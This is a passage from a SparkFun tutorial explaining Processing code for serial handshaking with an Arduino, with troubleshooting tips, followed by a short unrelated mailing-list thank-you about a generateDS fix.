serialEvent() method, which gets called every time we see a specific character in the serial buffer, which acts as our delimiter - basically it tells Processing that we’re done with a specific ‘chunk’ of data - in our case, one ‘Hello, world!’.
The beginning of our sketch is the same except for a new
firstContact boolean, which let’s us know when we’ve made a connection to Arduino.
language:java import processing.serial.*; //import the Serial library Serial myPort; //the Serial port object String val; // since we're doing serial handshaking, // we need to check if we've heard from the microcontroller boolean firstContact = false;
Our
setup() function is the same as it was for our serial write program, except we added the
myPort.bufferUntil('\n'); line. This let’s us store the incoming data into a buffer, until we see a specific character we’re looking for. In this case, it’s a carriage return (\n) because we sent a Serial.println from Arduino. The ‘ln’ at the end means the String is terminated with a carriage return, so we know that’ll be the last thing we see.
language:java void setup() { size(200, 200); //make our canvas 200 x 200 pixels big // initialize your serial port and set the baud rate to 9600 myPort = new Serial(this, Serial.list()[4], 9600); myPort.bufferUntil('\n'); }
Because we’re continuously sending data, our
serialEvent() method now acts as our new
draw() loop, so we can leave it empty:
language:java void draw() { //we can leave the draw method empty, //because all our programming happens in the serialEvent (see below) }
Now for the big one:
serialEvent(). Each time we see a carriage return this method gets called. We need to do a few things each time to keep things running smoothly:
- read the incoming data
- see if there’s actually anything in it (i.e. it’s not empty or ‘null’)
- trim whitespace and other unimportant stuff
- if it’s our first time hearing the right thing, change our
firstContactboolean and let Arduino know we’re ready for more data
- if it’s not our first run, print the data to the console and send back any valid mouse clicks (as 1’s) we got in our window
- finally, tell Arduino we’re ready for more data
That’s a lot of steps, but luckily for us Processing has functions that make most of these tasks pretty easy. Let’s take a look at how it all breaks down:
language:java void serialEvent( Serial myPort) { //put the incoming data into a String - //the '\n' is our end delimiter indicating the end of a complete packet val = myPort.readStringUntil('\n'); //make sure our data isn't empty before continuing if (val != null) { //trim whitespace and formatting characters (like carriage return) val = trim(val); println(val); //look for our 'A' string to start the handshake //if it's there, clear the buffer, and send a request for data if (firstContact == false) { if (val.equals("A")) { myPort.clear(); firstContact = true; myPort.write("A"); println("contact"); } } else { //if we've already established contact, keep getting and parsing data println(val); if (mousePressed == true) { //if we clicked in the window myPort.write('1'); //send a 1 println("1"); } // when you've parsed the data you have, ask for more: myPort.write("A"); } } }
Oof. That’s a lot to chew on, but if you read carefully line by line (especially the comments), it’ll start to make sense. If you’ve got your Arduino code finished and loaded onto your board, try running this sketch. You should see ‘Hello, world!’ coming in on the console, and when you click in the Processing window, you should see the LED on pin 13 turn on and off. Success! You are now a serial handshake expert.
Tips and Tricks
In developing your own projects with Arduino and Processing, there are a few ‘gotchas’ that are helpful to keep in mind in case you get stuck.
- make sure your baud rates match
- make sure you’re reading off the right port in Processing - there’s a
Serial.list()command that will show you all the available ports you can connect to.
- if you’re using the
serialEvent()method, make sure to include the
port.bufferUntil()function in your
setup()method.
- also, make sure that whatever character you’re buffering until (e.g., ‘\n’) is a character that you’re actually sending from Arduino.
- If you want to send over a number of sensor values, it’s a good idea to count how many bytes you’re expecting so you know how to properly parse out the sensor data. (the example (shown below) that comes with Arduino gives a great example of this:
This is the example to select for some good sensor parsing code
Resources and Going Further
Now that you know how to send data from Arduino to Processing and back again (even simultaneously!), you’re ready for some seriously cool projects..
Here are a few useful links that you may find useful going forward:
|
https://learn.sparkfun.com/tutorials/connecting-arduino-to-processing/all
|
CC-MAIN-2015-14
|
refinedweb
| 3,030
| 69.82
|
I.
This is a discussion on Turn a string into an array within the C++ Programming forums, part of the General Programming Boards category; I'm kind of new to C++ and I want to turn a string into an array. I want to separate ...
I.
I'm not sure if you are aware of this.. but <string> class variables can be accessed like arrays...
example:
Code:string first_name = "Jose"; char first_initial = first_name[0];
so basically, a string class variable are just an array of characters.
Last edited by The Brain; 12-22-2004 at 11:27, no, no. Let's say I have this string: "Joe+Dan+Tom"
I want to create an array with Joe Dan and Tom as the elements of it. I want to create an array from the string by separating the elements with the plus sign.
If you put that string into a stringstream, you can use the getline function with '+' as the delimiter.
strtok perhaps?
#include <string.h>
char *strtok(char *s1, const char *s2);
Description:
Searches one string for tokens, which are separated by delimiters defined in a second string.
strtok considers the string s1 to consist of a sequence of zero or more text tokens, separated by spans of one or more characters from the separator string s2.
The first call to strtok returns a pointer to the first character of the first token in s1 and writes a null character into s1 immediately following the returned token. Subsequent calls with null for the first argument will work through the string s1 in this way, until no tokens remain.
The separator string, s2, can be different from call to call.
Note:
Calls to strtok cannot be nested with a function call that also uses strtok. Doing so will causes an endless loop.
Return Value:
strtok returns a pointer to the token found in s1. A NULL pointer is returned when there are no more tokens.
Code:#include <cmath> #include <complex> bool euler_flip(bool value) { return std::pow ( std::complex<float>(std::exp(1.0)), std::complex<float>(0, 1) * std::complex<float>(std::atan(1.0) *(1 << (value + 2))) ).real() < 0; }
Umm...how would I do that? Heh, sorry, as I said, I'm pretty new to C++. I only know PHP, so I am basically thinking of a function like explode() in PHP. Is there a function like that in C++?
I'd stick to C++ strings, and use the "find" and "substr" methods which come with that class.
That made no sense to me, can anyone else help?
Ok so you want to call explode() on a string and get back an array of strings right?
So you should want as a return from your explode function a vector<string>
You should pass your explode function a string or string & and a delimiter character.
Inside your explode function you'll have to call find to find the the occurances of the delimiter character. As you find them you simply call substr to pull out the piece you want and then push_back it into the vector. Once you are done parsing the string then you return the vector.
|
http://cboard.cprogramming.com/cplusplus-programming/59988-turn-string-into-array.html
|
CC-MAIN-2015-11
|
refinedweb
| 528
| 73.27
|
After you have worked on two or three major projects, you begin to understand that many apps incorporate common features, components, and dialogs. Just like you will set up a common directory of frequently-used functions, you can do the same thing for other common components. This article discusses one approach (there are others - see Other Approaches below) to sharing dialog resources between projects.
What exactly does "sharing a dialog resource" mean? Well, first there is the dialog resource definition, usually stored in a .rc file. And then there will be controls on the dialog, and these controls will each have an ID - such as IDC_NAME or IDI_MYICON. The definitions of these IDs must accompany the dialog's resource (.rc) file. It is convenient to store all these definitions together in one .h file - but it must be named something unique, and must not be named resource.h. And finally, the dialog will have some code - typically at least OnInitDialog(), DoDataExchange(), and maybe OnOk(). So for each dialog, there will be at least four files:
IDC_NAME
IDI_MYICON
OnInitDialog()
DoDataExchange()
OnOk()
WARNING: You must have a DialogRes.h (or some other name) for each rc file. If you do not, Visual Studio will associate resource.h with the rc file, and your original resource.h will be overwritten. PLEASE MAKE A BACKUP.
But it is not enough to just organize the dialog's functionality into four files. It is also necessary to ensure that any app which includes these files can do so transparently: by this I mean it will not be necessary to edit or change any of the four files. When this requirement is met, you will have truly shareable dialogs. In the remainder of this article, I will discuss the specific things that must be done to meet this requirement.
Achieving transparency is actually documented in MSDN, but few people make use of it. I refer to the fact that CDialog has three constructors:
CDialog
CDialog(LPCTSTR lpszTemplateName, CWnd* pParentWnd = NULL);
CDialog(UINT nIDTemplate, CWnd* pParentWnd = NULL);
CDialog();
It is the first form that is important here. What we are trying to do is insulate the app from the specific implementation details of the dialog. Unfortunately, the usual Visual Studio-generated header file for dialogs has a line that looks like:
enum { IDD = IDD_ABOUTBOX };
This effectively ties the dialog to the app, because the app needs to know the value of IDD_ABOUTBOX if it is going to include About.h. With the standard enum approach, either the app or About.h must include AboutRes.h. This is very undesirable, because it means that all the IDs defined in AboutRes.h will be visible to the app, and hence must be unique across the app. If you are dealing with an app that has hundreds of dialogs, you will quickly run out of replacements for things like IDC_NAME.
IDD_ABOUTBOX
This is where the first CDialog constructor comes in - that, plus,
That is not documented too well: The only resource IDs that need to be unique are those that have application scope.. This means that dialog IDs, string resource IDs, and a few others need to be unique. All the rest (in fact, the majority) of IDs do not need to be unique application-wide, as long as they are unique within any one dialog.
Putting these things together, we know that we can use a string as the dialog identifier. So what we do is this:
Just click on OK - About.rc will be included.
#include "about.rc"
#endif
When IDD_ABOUTBOX is double-clicked, the dialog from About.rc will be displayed in the Resource Editor:
CAboutDlg
CAboutDlg::CAboutDlg() : CDialog(_T("IDD_ABOUTBOX"))
{
//{{AFX_DATA_INIT(CAboutDlg)
//}}AFX_DATA_INIT
}
Finally, here is
As you have seen, you can double-click on IDD_ABOUTBOX to get into the Resource Editor. You can then change the dialog, add controls, etc., just as with any other dialog. But there is one thing you cannot do: Normally, you could go to View | ClassWizard and add variables for the various control IDs. If you do this with the demo, you will not see any of the control identifiers, such as IDC_ABOUT_EMAIL. Here is the trick: right-click on the dialog you see in the Resource Editor, and select ClassWizard.... You will be presented with this dialog:
IDC_ABOUT_EMAIL
Click Cancel. You will then see the standard Class Wizard dialog, with all control identifiers:
The key to creating a shareable dialog resource is to minimize coupling with the app. Here is how the About dialog looks in Debug mode:
and here is how it looks in Release mode:
In each of these, there are actually four pieces of data that are being retrieved from an external source:
CString strTitle;
if (!strTitle.LoadString(AFX_IDS_APP_TITLE))
strTitle.Empty();
WORD wFileVersion[4];
CVersion version;
version.Init();
version.GetFileVersion(&wFileVersion[0],
&wFileVersion[1],
&wFileVersion[2],
&wFileVersion[3]);
CString strCopyright(_T(""));
version.GetLegalCopyright(strCopyright);
m_Copyright.SetWindowText(strCopyright);
CString strEmail(_T(""));
version.GetStringInfo(_T("E-mail"), strEmail);
In addition to the above, About.cpp uses the global defines _DEBUG and BETA_VERSION to display additional information.
_DEBUG
BETA_VERSION
In summary, to effectively implement shareable dialogs, you must combine good organization with well thought-out design. In the demo About dialog, external information comes from string and version resources that are implemented in the app. This works well, but the consequence is that every app must implement these string and version resources in the same way, in order to be able to use the About dialog. There are other app-dialog interfaces possible, of course, but the point is that when you have chosen the interface, every app must implement the interface in the same way.
Using a dialog that has been included in the way described above is no different than using any other dialog:
void CXDialogImportDlg::OnButton1()
{
CAboutDlg dlgAbout;
dlgAbout.DoModal();
}
Of course there are other ways to realize shareable dialogs. In considering the various approaches, I had in mind a few goals that I did not want to give up:
Keeping in mind the above goals, here are some other approaches that you might want to consider:
One piece of information that is indispensable in production apps is the build number. In the demo About dialog, the build number comes from the version resource. I use Auto-Incrementing Build Numbers by Navi Singh to automatically increment the build number inside the version resource. All you have to do is put the version resource inside the .rc2 file, replace the hard-coded versions with strings (see Navi's article), and install Navi's autobuild add-in. After that, each time you hit Build, the build number will be incremented.
This software is released into the public domain. You are free to use it in any way you like. If you modify it or extend it, please)
I suppose if you only have one dialog to share, this solution would be ok. I still don't find it much easier than importing the resources from a saved template and then just adding the source files to the project. The only editing needed is the app include in the source files. Usually dialogs such as ABOUT etc... have some customization between apps anyway, even if just uniques logos, graphics, etc...
If you have multiple dialogs to share between apps and no customization is needed, it is a much simpler solution to create and use a resources DLL. This way you have ALL of your resources available in just one programming step.
So what if you have to distribute a DLL... You're also reducing system overhead by dynamically loading your resources.
Just for what it's worth. This is still good information. Nice job. I'm voting you a 4. Thanks for sharing your ideas.
//{{AFX_xxxx}
General News Suggestion Question Bug Answer Joke Rant Admin
Use Ctrl+Left/Right to switch messages, Ctrl+Up/Down to switch threads, Ctrl+Shift+Left/Right to switch pages.
News on the future of C# as a language
|
http://www.codeproject.com/Articles/4372/XDialogImport-How-to-share-dialogs-between-project?fid=15845&df=10000&mpp=50&noise=3&prof=True&sort=Position&view=None&spc=None
|
CC-MAIN-2014-10
|
refinedweb
| 1,334
| 63.7
|
Vector3d.ToString() et al are not locale-safePosted Sunday, 20 June, 2010 - 18:54 by anathema
Description
I'm raising this as a bug as I think it's a bit of a useability issue, but please feel free to disagree!
public override string ToString() { return String.Format("({0}, {1}, {2})", X, Y, Z); }
The above isn't suitable for use in cultures which use the comma as the decimal-separator. This means my German beta-tester sees this...
(1,0, 1,1, 1,0)
Are there any plans to change this? :-)
#1
Edit: you are right, this is not locale-safe. I'll see what can be done.
#2
#3
What do you want to do? Have (1.0, 1.0, 1.0) always or use (1,0; 1,0; 1,0) on systems that use , for decimal separation? (both is possible of course)
#4
I think the most sensible approach would be to find out what XNA does and do the same here.
#5
I was rather surprised that there doesn't appear to be anything in the CultureInfo system to cover this case. However, I've - so far - been unable to locate anything to suggest what's normally done in such cultures. The semi-colon just looks weird to me...but then again, so does the comma-as-decimal-separator :-)
#6
Poking around inside the Media3D namespace, it appears that MS use the ';' when the decimal-sep is the ',' and the ',' otherwise. There's a handy little class called TokenizerHelper which provides this functionality, but unfortunately it's internal :-(
Not that it's difficult to implement of course...
#7
There's a List Separator in the region settings, maybe that is accessible through .NET localization functionality somehow.
#8
You mean this?...
#9
Yes.
#10
Excuse my ignorance but what's wrong with plain
{1.0 1.0 1.0 1.0}or
{1,0 1,0 1,0 1,0}?
|
http://www.opentk.com/node/1880
|
CC-MAIN-2014-10
|
refinedweb
| 323
| 74.19
|
Error importing ZZ
I'm trying to switch to a more software-development-like approach for one of my projects. To this end I'll be writing several files, and I'll be trying to keep imports to a minimum to speed up module loading.
At first I started with a file
foo.sage and a
Makefile which preparses this using
sage -min -preparse foo.sage. But the resulting
foo.sage.py still starts with
from sage.all_cmdline import *. I thought the point of the
-min switch was to avoid just that. Am I missing something here?
Next I tried to write Python code instead. But there I got problems, apparently because I was loading modules in the wrong order. Take for example a file
foo.py containing just the line
from sage.rings.integer_ring import ZZ. My Sage 7.4 on Gentoo will print the following when running said file as
sage foo.py:
Traceback (most recent call last): File "foo.py", line 1, in <module> from sage.rings.integer_ring import ZZ File "sage/rings/integer.pxd", line 7, in init sage.rings.integer_ring (…/rings/integer_ring.c:14426) File "sage/rings/rational.pxd", line 8, in init sage.rings.integer (…/rings/integer.c:49048) File "sage/rings/fast_arith.pxd", line 3, in init sage.rings.rational (…/rings/rational.c:36533) File "sage/libs/pari/gen.pxd", line 5, in init sage.rings.fast_arith (…/rings/fast_arith.c:8139) File "sage/libs/pari/gen.pyx", line 91, in init sage.libs.pari.gen (…/libs/pari/gen.c:135191) File "/usr/lib64/python2.7/site-packages/sage/rings/infinity.py", line 228, in <module> from sage.rings.integer_ring import ZZ ImportError: cannot import name ZZ
Is there a way to reasonably import things like this without too much experimentation, and without importing far more than I actually need here?
This is a very good question and could really use an answer from an expert!
|
https://ask.sagemath.org/question/35522/error-importing-zz/
|
CC-MAIN-2019-18
|
refinedweb
| 322
| 71.82
|
13 January 2012 03:10 [Source: ICIS news]
By Wong Lei Lei
?xml:namespace>
SINGAPORE
Spot values fell for the second consecutive week, with trades remaining thin as most buyers are waiting for prices to bottom out, they said.
Prices of drummed refined glycerine spot cargoes fell around 10% over two weeks to $700-780/tonne (€546-608/tonne) FOB (free on board) SE (southeast)
“I think some suppliers are under pressure to clear the inventory and thus the lower offers this week,” a trader said.
“Some suppliers may have held back on offering earlier on, anticipating further increase in prices,” said a buyer, adding that this likely contributed to the current oversupply situation.
A few major oleochemical producers from Malaysia has maintained their refined glycerine prices at above $800/tonne FOB SE Asia, saying they see no reason to decrease prices, as they are “comfortable” with their inventory levels.
Some players, however, are optimistic that prices would stabilise soon, to spur more buying activities in the spot refined glycerine market.
“I expect the prices to stabilize soon at $700s/tonne FOB SE Asia levels and buyers will soon start purchasing as most are still not well covered for this quarter,” said a major trader.
Many buyers have been buying spot cargoes on a hand-to-mouth basis in the last few months, when prices stayed above $800/tonne FOB SE Asia levels.
Producers were able to hold firm with their offers because of limited supply.
Availability of cargoes was scarce for the most part of the fourth quarter 2011, but the situation had reversed in late December.
“Glycerine supply has eased now that most oleochemical plants are back up after their annual turnaround in the last quarter, and there is also more supply from the biodiesel plants,” a producer said.
Glycerine is a by-product of oleochemical and biodiesel production. It has a wide variety of uses in the food industry and personal care industry - as a humectant and solvent – and in skincare products and toothpastes. Industrial usage for glycerine includes alkyd resins and cellophanes.
(
|
http://www.icis.com/Articles/2012/01/13/9522948/high-inventory-weighs-on-asia-refined-glycerine-market.html
|
CC-MAIN-2015-11
|
refinedweb
| 346
| 55.68
|
Hi guys,
I'm trying to write a program that stores a name, ID number, average test score, and letter grade for up to 20 students. This code here will only store/print one student's information. I can't figure out how to get it to store more than that. Any advice?
I know not all the steps are there for everything, my main concern is how to get it to store/print more than one student. I appreciate any responses.I know not all the steps are there for everything, my main concern is how to get it to store/print more than one student. I appreciate any responses.Code:#include <iostream> using namespace std; struct node { char name[20]; // Name of up to 20 letters int idNum; int avgScore[20]; char grade[20]; node *nxt; // Pointer to next node }; node *start_ptr = NULL; node *current; // Used to move along the list int option = 0; void add_record() { node *temp, *temp2; // Temporary pointers //node avgScore; // Reserve space for new node and fill it with data int* a = NULL; // Pointer to int, initialize to nothing. int n; // Size needed for array cout << "\n\t--------------Student Information---------------\n"; cout << "How many test scores this semester? "; cin >> n; // Read in the size a = new int[n]; // Allocate n ints and save ptr in a. for (int i=0; i<n; i++) { a[i] = 0; // Initialize all elements to zero. } int m; cout << "How many students in the course? "; cin >> m; temp = new node; for (int k=0; k<m; k++) { cout << "Please enter the name of student " << (k+1) << ": "; cin >> temp->name; cout << "Please enter the ID Number of the student : "; cin >> temp->idNum; cout << "Please enter student's test scores for the " << n << " tests: "; for (int j=0; j<n; j++) { cout << "\nTest " << (j+1) << ": "; cin >> a[j]; /*for (int p=0; p<j; p++) { temp->avgScore = (temp->avgScore + a[p]) / p; }*/ } } << "List currently empty." << endl; else { while (temp != NULL) { // Display details for what temp points to cout << "Name : " << temp->name << " "; cout << "idNum : " << temp->idNum << " "; cout << "avgScore : " << temp->avgScore; if (temp == current) cout << " <-- Current node"; cout << endl; temp = temp->nxt; } cout << "End of list!" << endl; } } void main() { start_ptr = NULL; do { display_list(); cout << endl; cout << "Please select an option : " << endl; cout << "1. Create new record." << endl; cout << "2. Exit the program." << endl; cin >> option; switch (option) { case 1 : add_record(); break; } } while (option != 2); }
Thanks!
|
http://cboard.cprogramming.com/cplusplus-programming/103281-help-cplusplus-linked-lists.html
|
CC-MAIN-2014-23
|
refinedweb
| 401
| 78.38
|
Tech Off Thread5 posts
Forum Read Only
This forum has been made read only by the site admins. No new threads or comments can be added.
"Where o' where did my arg[0] go?"
Conversation locked
This conversation has been locked by the site admins. No new comments can be made.
Where o' where can it be?
If you compile and run the code below, you will see that arg[0] no longer contains the name of the .exe that was executed (as it did in C/C++). Am I missing something here?
namespaceConsoleApplication4
{class Class1
{static void Main(string[] args)
{
}
}
}
You're not missing anything... args now just contain arguments. Use Environment.CommandLine for the executable name. It will contain full path name, so prepare to parse (well, there's an API for that too)
Ditto what Minh said. C# is not C/C++ in a lot of ways. You can still do it the crufty old way in Managed C++.
(still using C++, since 1988)
Environment.CommandLine contains the entire command-line, including arguments, so it may or may not be what you want.
Environment.GetCommandLineArgs[0] is the executable name, but may or may not include full path and file name extension, depending on the circumstances.
The easiest way to get the full path of the assembly and be certain of the result, is using System.Reflection.Assembly.GetEntryAssembly().Location.
You can then use System.IO.Path.GetFileName and System.IO.Path.GetDirectoryName to get the parts of the path you need.
Thanks for the pointers. C# has been a major boon to productivity after many years of c/c++, but the little quirks still get me.
|
https://channel9.msdn.com/Forums/TechOff/25628-quotWhere-o-where-did-my-arg0-goquot
|
CC-MAIN-2017-43
|
refinedweb
| 280
| 69.07
|
RADU: Processing & Interpreting ROS Movement Messages with Python
—
—
Posted in Robots, Radu, Microcontrollers, Rasperry, Raspberry_pico, Micropython
When using the Robot Operating System, nodes are started, topics published, messages send. Internally, the ROS nodes use these messages to communicate with each other. Now, if you build a robot that uses ROS as the communication middleware, you need to write custom code which will parse these messages and transform them to meaningful commands for your robot.
This article is a step-by-step tutorial about making your robot move based on ROS messages with the
Twist message format. First, we will start ROS nodes and investigate the
Twist messages that they exchange. Second, we need to decide the best approach and format to handle convert this data into a form that the robot understands. Finally, we implement the logic in the robot.
The technical context of this article is
Ubuntu 20.04 LTS with latest
ros-noetic and
Python 3.8.10
Starting ROS
For the start, we need three different terminals.
In the first terminal, start
roscore.
$> roscore ... logging to /home/devcon/.ros/log/6c0f6dc0-e33f-11eb-9a51-737b11e35b15/roslaunch-giga-442540.log Checking log directory for disk usage. This may take a while. Press Ctrl-C to interrupt Done checking log file disk usage. Usage is <1GB. started roslaunch server ros_comm version 1.15.11 SUMMARY ======== PARAMETERS * /rosdistro: noetic * /rosversion: 1.15.11 NODES auto-starting new master process[master]: started with pid [442548] ROS_MASTER_URI= setting /run_id to 6c0f6dc0-e33f-11eb-9a51-737b11e35b15 process[rosout-1]: started with pid [442558] started core service [/rosout]
Then in the second, start the
teleop-twist-keyboard. With this node, you can use the keyboard to generate messages.
$> rosrun teleop_twist_keyboard teleop_twist_keyboard.py.0 ... currently: speed 0.5 turn 0.47351393100000017
But where are these messages generated? Let’s explore the available ROS topics.
$> rostopic list /rosout /rosout_agg /cmd_vel /color_sensor /pose
The messages are published in the topic
/cmd_vel.
Twist Message Format
We can check the data format of the topic
/cmd_vel.
$> rostopic type /cmd_vel geometry_msgs/Twist $> rosmsg show geometry_msgs/Twist geometry_msgs/Vector3 linear float64 x float64 y float64 z geometry_msgs/Vector3 angular float64 x float64 y float64 z
In addition to the command line, we can also use the graphical tool
rqt.
But what is the meaning of this message?
TWIST Message Format Explained
The
twist message format consists of two parts. In its
linear component, the planar directions for the three dimensions x, y, and z are defines as float values. Think of this as the speed your robot should drive in each direction. For example, the following command shows that a robot should move with the speed of 2 in the direction of x.
linear: x: 2.0 y: 0.0 z: 0.0
The
angular component defines the change in orientation of a movement, for the three coordinates x, y, and z, expressed as radians per second. The coordinates represent the yaw, pitch and roll axis. This means that the z value describes a change in the 2d plane.
angular: x: 0.0 y: 0.0 z: 1.5
The unit
radians means: Given a circle with radius r, a radian is the distance r along the circles border.
ROS: Twist Message Provider
Understanding the data format, lets define a ROS node that subscribes to this message.
First, we create a new ROS package.
catkin_create_pkg teleop_listener twist rospy
Then, create the file
scripts/listener.py. This script will create a ROS node that subscribes to the topic
/cmd_vel. For simplicity, we will just print the received messages.
# scripts/listener.py import rospy import time from geometry_msgs.msg import Twist def callback(twist_msg): rospy.loginfo(rospy.get_caller_id() + "Received Data") rospy.loginfo('Sending ' + repr(twist_msg)) def listener(): rospy.init_node('twist_listener') rospy.Subscriber('/cmd_vel', Twist, callback) rospy.loginfo('Twist Listener started') rospy.spin() if __name__ == '__main__': listener()
Starting this program, we can see that the
twist messages are successfully parsed.
[INFO] [1627208023.888022]: Twist Listener started [INFO] [1627208028.010496]: /twist_listenerReceived Data [INFO] [1627208028.014720]: Sending linear: x: 2.0 y: 0.0 z: 0.0 angular: x: 0.0 y: 0.0 z: 0.0
Now we need to think about how this format will be interpreted by our robot.
Twist Message Format Wrapper on the Host Computer
The received messages have only two values that are meaningful for a planar, wheeled robot. The
linear x value determines the forward or backward direction, and the
angular z determines the amount of turns that the robot needs to make.
As documented in my earlier articles best practices for handling serial data, the most performant data formats that the motor controller receives is either bit fields or texts. Texts have the additional benefit for being more extensive than bit fields, and therefore we will use them.
The
scripts/listener.py will extract the linear and angular value, and create a text message in the form
TWIST_MSG:(MOVE=2.0, TURN=0.0). Here is the code:
# scripts/listener_refined.py import rospy import time from geometry_msgs.msg import Twist def callback(twist_msg): rospy.loginfo(rospy.get_caller_id() + "Received Data") radu_msg = repr(f'TWIST_MSG:(MOVE={twist_msg.linear.x}, TURN={twist_msg.angular.z})') rospy.loginfo('Sending <<' + radu_msg + '>>') ser.write((radu_msg + "\n").encode('utf-8')) def listener(): rospy.init_node('radu_mk1') rospy.Subscriber('/cmd_vel', Twist, callback) rospy.spin() if __name__ == '__main__': listener()
Twist Message Format Gateway on the Microcontroller
The received message seems simple, but we cannot parse it straight ahead. The values for
MOVE and
TURN need to translated to concrete commands of your robot. This involved consideration such as the speed values, the wheel diameter, the turn radius, and much more. I highly recommend this great blog article about motor controller that summarizes the essential math. In essence: Movement and turn commands are speed values, and these needs to be converted to duty cycles of PWM signals send to the motors.
Handling messages and transforming them to the internal format is responsibility of a class that I termed
MessageGateway. This class is instantiated with a concrete serial connection interface, then actively polls the interface for new messages, and of available, parses and translates them
Let’s develop the gateway step-by-step.
The
main.py class create an instance of
MessageGateway with a serial connection object.
#robot/radu/message_gateway.python class MessageGateway(): def __init__(self, serial_obj): self._serial = serial_obj self.speed_limits= limits['speed'] self.twist_matcher = ure.compile('TWIST_MSG') self.move_matcher = ure.compile('MOVE=(-?\d+.\d+)') self.turn_matcher = ure.compile('TURN=(-?\d+.\d+)')
Once created,
main.py will regularly call
gateway.poll()
while True: obj = gateway.poll() if obj: robot.process(obj) sleep_ms(5)
The
poll() method checks if any data from its serial connection exists...
def poll(self): msg = self._serial.read() if msg: commands = self.parse(msg) return commands return None
... and if yes, will call the
parse() method. In this method, the following steps happen:
- Check if the message is a TWIST message (by using regular expressions)
- For the
MOVEand
TURNcommands, extract the
floatvalue (by using regular expressions
- return a list of tuples with the commands
def parse2(self, msg): try: if self.twist_matcher.search(msg): move_string = self.move_matcher.search(msg).groups() move_value = float(move_string[0]) turn_string = self.turn_matcher.search(msg).groups() turn_value = float(turn_string[0]) result = [('MOVE', move_value), ('TURN', turn_value)] print('PARSE2', result) return({'TWIST_MSG': result}) except Exception as e: print('MessageGateway error', msg, e) return None
Motor Controller on the Microcontroller
The next step is to process the movements commands inside
main.py. The following method parses the command tuple and saves the movement values which are
float values. From this, it calculates the duty cycle for both wheels, and
clips the values so they confirm with the motor (in my case: a minimum of
49000, and a maximum of
65000). Then it sets the duty cycle on the servo motors.
def process_twist_msg(self, commands): linear = angular = 0 for tuple in commands: key, value = tuple if key == 'MOVE': linear = value if key == 'TURN': angular = value m1_duty_percent = (linear - (angular * WHEEL_DISTANCE))*2 m2_duty_percent = (linear + (angular * WHEEL_DISTANCE))*2 duty_cycle1 = self.clip(m1_duty_percent) duty_cycle2 = self.clip(m2_duty_percent) self.logger.status("M1: {} dty".format(duty_cycle1)) self.m1.move2(duty_cycle1) self.m2.move2(duty_cycle2)
Conclusion
When connecting your robot to ROS, you need to parse the ROS specific messages to your robot. In this article, I showed how to translate the ROS
Twist message format, which are movement information, to a format that the Robot can understand. The design space for this problem is huge. First, you need to decide how much interpretation of the format you are doing on the receiving ROS node, and how much the microcontroller to which the message is passed needs to do. Second, you decide the data format. The solution shown here evolved: While I was first passing complete Python objects, performance tests showed that working with texts is way faster. Third, you need to divide how to process the message inside your robot. For this, I adopted the
Gateway pattern: A central entity reads, parses, transforms the messages, and applies conversion (e.g. set appropriates speed limits). If your application gets complex, and when you need to send even more messages, then having a central Gateway class that encapsulate all of these steps is essential. Fourth, you need to transform the obtained values into concrete motor controller commands. In my case, this boils down to duty cycles of PWM, clipped into the possible minimum and maximum values.
|
https://admantium.com/blog/robo13_process_ros_movement_messages/
|
CC-MAIN-2022-21
|
refinedweb
| 1,572
| 50.94
|
Windows 2000 Professional: Restrict ActiveX controls
ActiveX controls extend the functionality of Internet Explorer, but they can also pose significant security risks. An ActiveX control could potentially access sensitive data, delete files, or cause other damage.
You can use Windows 2000 group policy to restrict ActiveX controls on a user's computer to a specific set of administrator-approved controls. By doing so, you let users continue using certain controls while restricting all others.
You can configure ActiveX group policy either at the local computer or at a higher level, such as an organizational unit or domain. To configure approved controls at the local level, open the MMC, and add the Group Policy snap-in focused on the local computer. Browse to the User Configuration\Administrative Templates\Windows Components\Internet Explorer\Administrator Approved Controls policy.
You'll find several policies that control specific ActiveX controls. Double-click a policy, and click Enabled to allow the use of that ActiveX control. To prevent its use, choose Disabled. Repeat the process for other controls as needed to allow or deny them based on your user and security requirements.
Windows 2000 Server: Set up a Dfs root
Windows 2000 Server includes the Distributed File System (Dfs) feature, which enables you to build a homogenous file system from disparate volumes and servers. This file system appears under a single namespace. To users, it appears as a single file system. However, the folders and files that make up the file system might actually reside on several different servers.
Windows 2000 Server supports a single Dfs root per server. Adding a Dfs root to a server is easy. Follow these steps:
- Navigate to the Administrative Tools folder, and open the Distributed File System console.
- Right-click the Distributed File System branch in the console, and choose New Dfs Root, which will start the New Dfs Root Wizard.
- Click Next, and then choose a stand-alone root or a domain root. (Stand-alone roots don't integrate with Active Directory or support automatic file replication, but domain roots support both.)
- Follow the wizard's prompts, and specify the domain name (for a domain-based root), the server name, and the share to use for the Dfs root. You can choose an existing share or create a new share.
After you create the root, you need to add Dfs links to the root. These links specify the folders that appear under the root, and they can specify folders on the local server, remote servers, or even client workstations.
To add the links, right-click the newly created root in the Dfs console, and choose New Dfs Link. In the resulting dialog box, enter a name for the link, the share to which it points, an optional comment, and the amount of time that clients will cache the link referral. Enter your settings, and click OK. Repeat the process to add other links as needed.
|
http://www.techrepublic.com/article/tech-tip-restrict-activex-controls-set-up-a-dfs-root/
|
CC-MAIN-2017-09
|
refinedweb
| 486
| 55.03
|
/** * Definition for singly-linked list. * public class ListNode { * int val; * ListNode next; * ListNode(int x) { val = x; } * } */ public class Solution { public ListNode reverseBetween(ListNode head, int m, int n) { ListNode start = new ListNode(0); start.next = head; ListNode prev = start, curr = head; int count = 1; while (curr != null) { if (count == m) { ListNode prev2 = null; ListNode curr2 = curr; ListNode tmp; while (count <= n && curr2 != null) { tmp = curr2.next; curr2.next = prev2; prev2 = curr2; curr2 = tmp; count++; } prev.next = prev2; curr.next = curr2; break; } prev = curr; curr = curr.next; count++; } return start.next; } }
Easy O(n) time and O(1) space java solution
Looks like your connection to LeetCode Discuss was lost, please wait while we try to reconnect.
|
https://discuss.leetcode.com/topic/37829/easy-o-n-time-and-o-1-space-java-solution
|
CC-MAIN-2017-47
|
refinedweb
| 117
| 69.38
|
Hi Dave, Right about the same time as you provided a fix I got pulled away on other projects. Just wanted to let you know that the fix works fine with a recently installed version of generateDS. Many thanks. Got a few other things, but I'll start new threads for them
